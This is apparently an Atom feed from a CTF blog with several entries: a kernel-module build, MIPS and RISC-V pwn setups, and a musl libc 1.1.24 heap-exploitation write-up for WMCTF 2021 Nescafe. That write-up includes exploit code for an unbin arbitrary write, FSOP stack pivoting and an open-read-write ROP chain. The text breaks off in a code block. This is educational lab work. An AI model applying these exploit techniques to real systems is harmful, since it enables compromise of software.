class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">hello_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> printk(KERN_INFO <span class="string">"Hello, exit!\n"</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">module_init(hello_init);</span><br><span class="line">module_exit(hello_exit);</span><br></pre></td></tr></table></figure><p>Next, load module.ko as a kernel module. Note that the generated module must not be named module, otherwise you get the following error</p><p><img src="/2021/09/09/kernel-pwn%E5%88%9D%E6%8E%A2/image-20210909190445406.png" alt="image-20210909190445406"></p><p>Renaming module to helloworld fixes it</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">KERNEL_DIR := /lib/modules/<span class="variable">$(<span class="built_in">shell</span> uname -r)</span>/build</span><br><span class="line">PWD := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line">helloworld-objs := hello.o</span><br><span class="line">obj-m := helloworld.o</span><br><span class="line"><span class="section">default:</span></span><br><span class="line"><span class="variable">$(MAKE)</span> -C <span class="variable">$(KERNEL_DIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">dmesg | tail -n 1</span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">dmesg | tail -n 2</span></span><br><span class="line">[49622.167231] module: module is already loaded</span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">sudo rmmod helloworld</span></span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">dmesg | tail -n 2</span></span><br><span class="line">[49780.637874] Hello, world!</span><br><span class="line">[50164.206571] Hello, exit!</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><blockquote>
<p>I really couldn't follow the introductory explanation on the Wiki before; now I'm trying to get into kernel pwn by following 轩哥's blog.</p>
</blockquote></summary>
<category term="kernel" scheme="https://brooke-hub.github.io/tags/kernel/"/>
</entry>
<entry>
<title>MIPS_PWN Introduction</title>
<link href="https://brooke-hub.github.io/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/"/>
<id>https://brooke-hub.github.io/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/</id>
<published>2021-09-09T03:58:37.000Z</published>
<updated>2021-09-13T09:13:52.492Z</updated>
<content type="html"><![CDATA[<blockquote><p>Tidying up my MIPS notes</p></blockquote><span id="more"></span><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>Tools</h2><p>mipsrop</p><h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>Challenges</h2><h3 id="Mplogin"><a href="#Mplogin" class="headerlink" title="Mplogin"></a>Mplogin</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">file Mplogin</span> </span><br><span class="line">Mplogin: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash">checksec Mplogin</span></span><br><span class="line">[*] '/home/wendy/Desktop/mips/Mplogin/Mplogin'</span><br><span class="line"> Arch: mips-32-little</span><br><span class="line"> RELRO: No RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX disabled</span><br><span class="line"> PIE: No PIE (0x400000)</span><br><span class="line"> RWX: Has RWX segments</span><br></pre></td></tr></table></figure><p>Run it with qemu in user mode as mipsel (little-endian)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span 
class="bash">tree -N -L 2</span></span><br><span class="line">.</span><br><span class="line">├── lib</span><br><span class="line">│ ├── ld-uClibc.so.0</span><br><span class="line">│ └── libc.so.0</span><br><span class="line">└── Mplogin</span><br><span class="line"></span><br><span class="line">1 directory, 3 files</span><br></pre></td></tr></table></figure><p>The challenge ships its lib directory, so -L ./ loads the libraries from the current directory directly</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">qemu-mipsel -L ./ Mplogin</span> </span><br><span class="line">-----we1c0me t0 MP l0g1n s7stem-----</span><br><span class="line">Username : </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Analyze it in IDA</p><p>In function sub_400840, the second print uses %s, which can print out stack contents</p><p>Function sub_400978 has a stack overflow</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">qemu-mipsel -g 1237 -L ./ Mplogin</span> </span><br><span class="line">-----we1c0me t0 MP l0g1n s7stem-----</span><br><span class="line">Username : adminbbbb</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch</span> 
</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> ls</span></span><br><span class="line">lib Mplogin</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> file Mplogin</span> </span><br><span class="line">Reading symbols from Mplogin...</span><br><span class="line">(No debugging symbols found in Mplogin)</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> <span class="built_in">set</span> architecture mips</span></span><br><span class="line">The target architecture is assumed to be mips</span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> target remote :1237</span></span><br><span class="line"><span class="meta">pwndbg></span><span class="bash"> b *0x00400920</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/09/MIPS-PWN-%E5%85%A5%E9%97%A8/image-20210909151721939.png" alt="image-20210909151721939"></p>]]></content>
<summary type="html"><blockquote>
<p>Tidying up my MIPS notes</p>
</blockquote></summary>
<category term="mips" scheme="https://brooke-hub.github.io/tags/mips/"/>
</entry>
<entry>
<title>RISC-V_pwn: A First Look</title>
<link href="https://brooke-hub.github.io/2021/09/09/RISC-V-pwn-%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/09/RISC-V-pwn-%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-09T02:04:00.000Z</published>
<updated>2021-09-13T09:12:14.956Z</updated>
<content type="html"><![CDATA[<blockquote><p>Heterogeneous-architecture pwn that I've been putting off for a long time; I plan to get started with a stack overflow challenge from *ctf2021</p></blockquote><span id="more"></span><h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>Environment Setup</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch -v</span></span><br><span class="line">GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2</span><br><span class="line">Copyright (C) 2020 Free Software Foundation, Inc.</span><br><span class="line">License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html></span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br></pre></td></tr></table></figure><h2 id="测试栈溢出"><a href="#测试栈溢出" class="headerlink" title="测试栈溢出"></a>Testing the Stack Overflow</h2><p>Just run it with the qemu-riscv64 provided by the challenge</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./qemu-riscv64 -g 1234 ./main</span> </span><br><span class="line">Input the flag: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</span><br><span class="line">You 
are wrong ._.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Debug with gef, which displays the RISC-V registers conveniently</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">gdb-multiarch</span> </span><br><span class="line"></span><br><span class="line">gef➤ file main</span><br><span class="line">Reading symbols from main...</span><br><span class="line">(No debugging symbols found in main)</span><br><span class="line">gef➤ set architecture riscv:rv64 </span><br><span class="line">The target architecture is assumed to be riscv:rv64</span><br><span class="line">gef➤ target remote :1234</span><br><span class="line">Remote debugging using :1234</span><br><span class="line">0x00000000000101c0 in ?? ()</span><br><span class="line"></span><br><span class="line">gef➤ c</span><br><span class="line">Continuing.</span><br><span class="line"></span><br><span class="line">Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x6161616161616160 in ?? 
()</span><br><span class="line"></span><br><span class="line">gef➤ p $pc</span><br><span class="line"><span class="meta">$</span><span class="bash">1 = (void (*)()) 0x6161616161616160</span></span><br><span class="line">gef➤ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>There is no NX, so the usual approach is ret2shellcode</p><p>Under qemu-user all addresses, including the stack address, are fixed within the same environment, so you need to know the remote stack address and then place the shellcode on the stack</p><p>The challenge provides the Docker image of the remote environment, so the remote address can be obtained by debugging locally</p>]]></content>
<summary type="html"><blockquote>
<p>Heterogeneous-architecture pwn that I've been putting off for a long time; I plan to get started with a stack overflow challenge from *ctf2021</p>
</blockquote></summary>
<category term="异构" scheme="https://brooke-hub.github.io/tags/%E5%BC%82%E6%9E%84/"/>
</entry>
<entry>
<title>musl_pwn: A First Look</title>
<link href="https://brooke-hub.github.io/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/"/>
<id>https://brooke-hub.github.io/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/</id>
<published>2021-09-05T02:25:28.000Z</published>
<updated>2021-09-23T08:13:57.523Z</updated>
<content type="html"><![CDATA[<blockquote><p>I plan to replay 5 musl pwn challenges, 4 of which are on version 1.2.2. I really can't get through the source code, sob, so just like when I learned glibc before, I'll go straight to gdb and look at the data to understand the structures and memory management. musl has no malloc_hook or free_hook, so with all protections enabled you usually can only attack the FILE structure. Start with version 1.1.24, which is similar to glibc.</p></blockquote><span id="more"></span><h1 id="Version-1-1-24"><a href="#Version-1-1-24" class="headerlink" title="Version 1.1.24"></a>Version 1.1.24</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>Overview</h2><blockquote><p><a href="https://musl.libc.org/">musl libc</a> is a lightweight libc library developed specifically for embedded systems, characterized by simplicity, small size and high efficiency. Quite a few Linux distributions use it as the default libc library in place of the bloated glibc, such as <a href="https://zh.wikipedia.org/zh-cn/Alpine_Linux">Alpine Linux</a> (anyone who has built Docker images will be familiar with it), <a href="https://zh.wikipedia.org/wiki/OpenWrt">OpenWrt</a> (commonly used on routers) and Gentoo.</p><p>The musl libc heap manager is roughly equivalent to <code>dlmalloc</code> (the predecessor of glibc's heap manager <code>ptmalloc2</code>), so some parts, such as chunk and unbin, are very similar to glibc.</p></blockquote><h2 id="数据结构"><a href="#数据结构" class="headerlink" title="数据结构"></a>Data Structures</h2><p>Detailed explanation: <a href="https://www.anquanke.com/post/id/202253#h2-4">从一次 CTF 出题谈 musl libc 堆漏洞利用</a> (musl libc heap exploitation, from the perspective of setting a CTF challenge)</p><p>Source: <a href="https://github.com/bminor/musl/blob/v1.1.24/src/malloc/malloc.c">v1.1.24/src/malloc/malloc.c</a></p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> {</span></span><br><span class="line"> <span class="keyword">size_t</span> psize, csize; <span class="comment">// equivalent to glibc's prev size and size</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">next</span>, *<span class="title">prev</span>;</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>The lowest bit of both psize and csize is the in-use flag</p><p><strong>chunk sizes: start at 0x20 and increase in steps of 0x20 (rather than 0x10)</strong></p><figure 
class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> {</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">uint64_t</span> binmap;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">bin</span> <span class="title">bins</span>[64];</span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> free_lock[<span class="number">2</span>];</span><br><span class="line">} mal;</span><br></pre></td></tr></table></figure><p>The <code>mal</code> struct is analogous to <code>main_arena</code> in glibc</p><p>It has three members: the 64-bit unsigned integer <code>binmap</code>, the array of list heads <code>bins</code>, and the lock <code>free_lock</code>.</p><p><code>binmap</code> records whether each bin is non-empty: if a bit is 1, the corresponding bin is non-empty, i.e. its list contains chunks.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bin</span> {</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> lock[<span class="number">2</span>];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">head</span>;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> *<span class="title">tail</span>;</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>The bins consist of 64 doubly linked circular lists structured like small bins; the lists are maintained FILO (chunks are taken from the head of the list and inserted at the tail).</p><p>Rough malloc process:</p><p>Compute the bin index from the size, then check binmap to see whether that bin has a free chunk; if so, unbin takes out the chunk pointed to by head</p><h2 id="常见利用"><a href="#常见利用" class="headerlink" title="常见利用"></a>Common Exploitation Techniques</h2><p>No checks are performed on the list or the chunk header while a chunk is taken out.</p><p>Using unbin to insert a target address into a bin gives an arbitrary address write</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">unbin</span><span class="params">(struct chunk *c, <span class="keyword">int</span> i)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">if</span> (c->prev == c->next)</span><br><span class="line">a_and_64(&mal.binmap, ~(<span class="number">1ULL</span><<i));</span><br><span class="line">c->prev->next = c->next;</span><br><span class="line">c->next->prev = c->prev;</span><br><span class="line">c->csize |= C_INUSE;</span><br><span class="line">NEXT_CHUNK(c)->psize |= C_INUSE;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="WMCTF-2021-Nescafe"><a href="#WMCTF-2021-Nescafe" class="headerlink" title="WMCTF_2021_Nescafe"></a><strong>WMCTF_2021_Nescafe</strong></h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./libc.so</span> </span><br><span class="line">musl libc (x86_64)</span><br><span 
class="line">Version 1.1.24</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p>musl 1.1.24 behaves much like glibc.</p><p>The chunk layout is very similar, and the commonly used small bins are managed as doubly-linked lists, much like glibc's smallbin.</p><p>The exploit for this challenge follows <a href="https://blog.csdn.net/qq_39948058/article/details/120035403?spm=1001.2014.3001.5501">WMCTF 2021 pwn Azly writeup</a></p><h3 id="静态分析"><a href="#静态分析" class="headerlink" title="Static analysis"></a><strong>Static analysis</strong></h3><p>The sandbox disables execve.</p><p>chunk size 0x200</p><p>idx 0-4</p><p>The pointer is not zeroed after free, so edit and show still work on it.</p><p>show can be used only once.</p><h3 id="how-to-leak"><a href="#how-to-leak" class="headerlink" title="how to leak"></a><strong>how to leak</strong></h3><p>After a chunk is freed it is inserted into a bin (mal+384) and managed as a doubly-linked list.</p><p>The chunk's <code>next*</code> and <code>pre*</code> pointer fields are then written with the bin address.</p><p>With the UAF, a direct show yields a libc address.</p><h3 id="how-to-hijack"><a href="#how-to-hijack" class="headerlink" title="how to hijack"></a><strong>how to hijack</strong></h3><blockquote><p>In gdb, <code>p mal</code> displays all bins.</p></blockquote><p>① As shown below, mal+384 can be treated as the bin.</p><p>First add two 0x200 chunks; the bin keeps pointing at the top chunk for the next allocation.</p><p>After freeing chunk0, the bin points to chunk0.</p><p>Both pointer fields of chunk0 also point to the bin.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911221746016.png" alt="image-20210911221746016"></p><p>② Use the UAF to modify chunk0's two pointer fields:</p><p>set next to bin-0x8</p><p>set pre to the target address</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fake_chunk = p64(mal+<span class="number">400</span>-<span class="number">0x18</span>) <span class="comment"># mal+376</span></span><br><span class="line">fake_chunk += p64(libc.sym[<span class="string">'__stdin_FILE'</span>]+<span class="number">0x40</span>) </span><br><span class="line">edit(<span class="number">0</span>,fake_chunk) </span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222824673.png" 
alt="image-20210911222824673"></p><p>③ The bin's head hands out chunk0's space, which becomes chunk2,</p><p>and it is unlinked.</p><p>chunk0's (chunk2's) pre, i.e. the target address stdin_FILE+0x40, becomes the bin's new head.</p><p>At the same time, the fd of the target address stdin_FILE+0x40 is written with the original chunk0's fd.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="string">'B'</span>*<span class="number">0x100</span>)<span class="comment">#2 stdin_file </span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222129217.png" alt="image-20210911222129217"></p><p>④ The bin's head hands out the space at stdin_FILE+0x40, which becomes chunk3.</p><p>The target address has been allocated successfully.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'A'</span>*<span class="number">0x30</span>+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x50</span>)+p64(ret)+p64(<span class="number">0</span>)+p64(mov_rdx) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">0</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>])+p64(pop_rdx)+p64(<span class="number">0x500</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line">add(<span class="string">'C'</span>*<span class="number">0xb0</span>+payload)<span class="comment">#3</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911222907607.png" alt="image-20210911222907607"></p><h3 id="从stdin溢出到stdout"><a href="#从stdin溢出到stdout" class="headerlink" title="Overflow from stdin into stdout"></a><strong>Overflow from stdin into stdout</strong></h3><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911174349792.png" alt="image-20210911174349792"></p><h3 id="(FSOP)修改-stdout-上的函数指针劫持程序控制流,进行栈迁移ROP"><a 
href="#(FSOP)修改-stdout-上的函数指针劫持程序控制流,进行栈迁移ROP" class="headerlink" title="(FSOP) Overwrite a function pointer in stdout to hijack control flow, then pivot the stack for ROP"></a><strong>(FSOP) Overwrite a function pointer in stdout to hijack control flow, then pivot the stack for ROP</strong></h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">mov_rdx = libc.address+<span class="number">0x000000000004951a</span> </span><br><span class="line"><span class="comment"># 0x7f687c98751a <longjmp+34>:mov rdx,QWORD PTR [rdi+0x30]</span></span><br><span class="line"><span class="comment"># 0x7f687c98751e <longjmp+38>:mov rsp,rdx</span></span><br><span class="line"><span class="comment"># 0x7f687c987521 <longjmp+41>:mov rdx,QWORD PTR [rdi+0x38]</span></span><br><span class="line"><span class="comment"># 0x7f687c987525 <longjmp+45>:jmp rdx</span></span><br><span class="line">payload = <span class="string">'E'</span>*<span class="number">0x30</span></span><br><span class="line">payload += p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x50</span>)+p64(ret) <span class="comment">#0x30</span></span><br><span class="line">payload += p64(<span class="number">0</span>)+p64(mov_rdx) <span class="comment">#0x40</span></span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">0</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>])+p64(pop_rdx)+p64(<span class="number">0x500</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line"></span><br><span class="line"></span><br><span 
class="line">leak(<span class="string">'pop_rdi'</span>,pop_rdi)</span><br><span class="line">pause()</span><br><span class="line">add(<span class="string">'C'</span>*<span class="number">0xb0</span>+payload)<span class="comment">#3</span></span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210911224458218.png" alt="image-20210911224458218"></p><p>This causes the gadget to be executed:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">mov rdx,QWORD PTR [rdi+0x30] </span><br><span class="line"># load the value stored at stdout_FILE+0x30 (stdout_FILE+0x50) into rdx </span><br><span class="line"># rdi:stdout_FILE+0x30 // rdx:stdout_FILE+0x50</span><br><span class="line"></span><br><span class="line">mov rsp,rdx </span><br><span class="line"># the stack top now points at stdout_FILE+0x50 (which holds the pop rdi gadget address)</span><br><span class="line"># rsp=rdx:stdout_FILE+0x50</span><br><span class="line"></span><br><span class="line">mov rdx,QWORD PTR [rdi+0x38] </span><br><span class="line"># load the value stored at stdout_FILE+0x38 (the ret gadget address) into rdx</span><br><span class="line"># rdx: ret_addr</span><br><span class="line"></span><br><span class="line">jmp rdx </span><br><span class="line"># jump to the ret gadget, which performs pop rip</span><br><span class="line"># the pop rdi gadget address at the stack top is popped and executed</span><br><span class="line"># the ROP chain continues and finishes read(0,addr,0x500)</span><br></pre></td></tr></table></figure><h3 id="执行-orw-ROP-读取-flag"><a href="#执行-orw-ROP-读取-flag" class="headerlink" 
title="Run an orw ROP chain to read the flag"></a><strong>Run an orw ROP chain to read the flag</strong></h3><p>Write the following to the __stdout_FILE address;</p><p>the key is to start writing gadgets at __stdout_FILE+0x38 and ROP once more,</p><p>because after SYS_read completes, execution jumps to the address stored at __stdout_FILE+0x38 (offset found by debugging).</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">'A'</span>*<span class="number">0x38</span> </span><br><span class="line">payload += p64(pop_rdi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x100</span>)+p64(pop_rsi)+p64(<span class="number">0</span>)+p64(libc.sym[<span class="string">'open'</span>]) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x200</span>)+p64(pop_rdx) +p64(<span class="number">0x100</span>)+p64(libc.sym[<span class="string">'read'</span>]) </span><br><span class="line">payload += p64(pop_rdi)+p64(<span class="number">1</span>)+p64(pop_rsi)+p64(libc.sym[<span class="string">'__stdout_FILE'</span>]+<span class="number">0x200</span>)+p64(pop_rdx) +p64(<span class="number">0x100</span>)+p64(libc.sym[<span class="string">'write'</span>]) </span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>,<span class="string">'\x00'</span>)+<span class="string">"./flag\x00"</span></span><br></pre></td></tr></table></figure><p>A similar challenge is <a href="https://www.anquanke.com/post/id/202253#h3-11">2020 XCTF 高校战“疫” musl-master</a></p><p>A heap overflow vulnerability, again exploited by hijacking through unbin.</p><p>I only wrote it up as far as allocating stdin; the rest is a bit tedious and I didn't feel like writing it.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span 
